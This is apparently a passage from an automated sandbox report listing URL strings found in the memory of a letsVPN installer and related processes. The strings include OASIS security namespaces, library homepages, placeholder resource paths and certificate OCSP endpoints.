              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/CancelT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/IssueT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/RenewT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT-Cancel
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Validate
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/ValidateT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinalxhttp://docs.oasis-open.org/ws-sx/w
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/IssueT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinalvhttp://docs.oasis-open.org/ws-sx/ws
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT-Cancel
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validate
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinal
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalw
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validatevhttp://docs.oasis-open.org/ws-sx/ws-t
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinalvhttp://docs.oasis-open.org/ws-sx/w
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Validate
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/ws-trust-1.3.xsd
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200802
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706/authclaims
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706/claims/action
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/federation/200706
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/xx/oasis-2004xx-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0Jurn:oasis:names:tc:SAML:1.0
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: svchost.exe, 0000000D.00000003.2167055659.0000020B58350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
              Source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.bamld
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboo
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboohttp://www.atomixbuttons.comhttp://web.singnet.com.sg/~rendsofthtt
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
              Source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
              Source: LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=
              Source: letsvpn-latest.exe, 00000015.00000003.2524906073.000000000310E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2710768941.00000000054F2000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
              Source: letsvpn-latest.exe, 00000015.00000003.2690094666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000002.2780682524.000000000040A000.00000004.00000001.01000000.0000000F.sdmp, letsvpn-latest.exe, 00000015.00000000.2224792878.000000000040A000.00000008.00000001.01000000.0000000F.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
